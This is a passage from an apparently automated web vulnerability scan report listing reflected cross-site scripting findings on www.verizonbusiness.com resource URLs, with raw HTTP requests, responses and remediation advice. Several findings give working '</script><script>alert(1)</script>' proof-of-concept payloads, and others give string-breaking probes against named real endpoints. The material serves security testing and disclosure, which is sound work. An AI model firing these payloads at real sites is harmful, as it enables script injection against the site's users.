Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a26-111-Executive+Leadership+Series.xml1d635</script><script>alert(1)</script>95f4b5f9926 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "884c83e5f12d578f1c253f962e47a4c8"
Last-Modified: Wed, 17 Nov 2010 00:22:37 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:37 GMT
Content-Length: 29400
Connection: close
Set-Cookie: BERT=VRID%3dfff09912-dae4-4956-8a89-3278989e5600|VTID%3df1be0dc1-2763-43b8-9db2-01f4c0454a18|SX%3d1289954556|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:26:20 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a26-111-Executive+Leadership+Series.xml1d635</script><script>alert(1)</script>95f4b5f9926</url>
...[SNIP]...

1.652. http://www.verizonbusiness.com/resources/1002a2a26-111-Executive+Leadership+Series.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a26-111-Executive+Leadership+Series.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac180'%3b332726deac6 was submitted in the REST URL parameter 2. This input was echoed as ac180';332726deac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/ac180'%3b332726deac6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:38 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40210
Date: Wed, 17 Nov 2010 00:22:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/ac180';332726deac6'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.653. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b164c"%3b109e4ebe9eb was submitted in the REST URL parameter 1. This input was echoed as b164c";109e4ebe9eb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesb164c"%3b109e4ebe9eb/1002a2a27-111-Think+Forward.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:25:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesb164c";109e4ebe9eb/1002a2a27-111-Think+Forward.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.654. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1a91'%3b333c0dd493c was submitted in the REST URL parameter 1. This input was echoed as d1a91';333c0dd493c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd1a91'%3b333c0dd493c/1002a2a27-111-Think+Forward.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:25:29 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesd1a91';333c0dd493c/1002a2a27-111-Think+Forward.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.655. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c60c'%3bad1b72eb2aa was submitted in the REST URL parameter 2. This input was echoed as 5c60c';ad1b72eb2aa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/5c60c'%3bad1b72eb2aa HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:46 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/5c60c';ad1b72eb2aa'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.656. http://www.verizonbusiness.com/resources/1002a2a27-111-Think+Forward.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a27-111-Think+Forward.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c142"%3b207d149bdb1 was submitted in the REST URL parameter 2. This input was echoed as 3c142";207d149bdb1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/3c142"%3b207d149bdb1 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/3c142";207d149bdb1";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.657. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f546"%3bf08503057ae was submitted in the REST URL parameter 1. This input was echoed as 2f546";f08503057ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2f546"%3bf08503057ae/1002a2a28-111-Small+&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:51 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:51 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources2f546";f08503057ae/1002a2a28-111-Small+&+Medium+Business.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.658. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4331'%3bf0c47aed74f was submitted in the REST URL parameter 1. This input was echoed as c4331';f0c47aed74f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc4331'%3bf0c47aed74f/1002a2a28-111-Small+&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcesc4331';f0c47aed74f/1002a2a28-111-Small+&+Medium+Business.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.659. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 389c0</script><script>alert(1)</script>d0f8cdbe771 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a28-111-Small+389c0</script><script>alert(1)</script>d0f8cdbe771&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "83d4c11a14741e60f58c33a236784469"
Last-Modified: Wed, 17 Nov 2010 00:24:59 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:24:59 GMT
Content-Length: 28918
Connection: close
Expires: Mon, 16 Nov 2009 18:24:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a28-111-Small+389c0</script><script>alert(1)</script>d0f8cdbe771&+Medium+Business.xml</url>
...[SNIP]...

1.660. http://www.verizonbusiness.com/resources/1002a2a28-111-Small+&+Medium+Business.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a28-111-Small+&+Medium+Business.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24cd2'%3bc8de5ccdeab was submitted in the REST URL parameter 2. This input was echoed as 24cd2';c8de5ccdeab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/24cd2'%3bc8de5ccdeab&+Medium+Business.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:25:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40252
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:25:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:25:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/24cd2';c8de5ccdeab&+Medium+Business.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.661. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2858"%3b3467d7bb59d was submitted in the REST URL parameter 1. This input was echoed as d2858";3467d7bb59d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesd2858"%3b3467d7bb59d/1002a2a29-111-Carrier+&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:17 GMT
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesd2858";3467d7bb59d/1002a2a29-111-Carrier+&+Wholesale.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.662. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a65be'%3b7e01bf5e966 was submitted in the REST URL parameter 1. This input was echoed as a65be';7e01bf5e966 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesa65be'%3b7e01bf5e966/1002a2a29-111-Carrier+&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesa65be';7e01bf5e966/1002a2a29-111-Carrier+&+Wholesale.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.663. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2520</script><script>alert(1)</script>d7834bd2c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a29-111-Carrier+b2520</script><script>alert(1)</script>d7834bd2c8&+Wholesale.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "b9410a0e73e3ad608f6b4bd4be258f2d"
Last-Modified: Wed, 17 Nov 2010 00:21:01 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:01 GMT
Content-Length: 29834
Connection: close
Expires: Mon, 16 Nov 2009 18:21:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/1002a2a29-111-Carrier+b2520</script><script>alert(1)</script>d7834bd2c8&+Wholesale.xml</url>
...[SNIP]...

1.664. http://www.verizonbusiness.com/resources/1002a2a29-111-Carrier+&+Wholesale.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a29-111-Carrier+&+Wholesale.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb666'%3b828307d0b65 was submitted in the REST URL parameter 2. This input was echoed as cb666';828307d0b65 in the application's response.

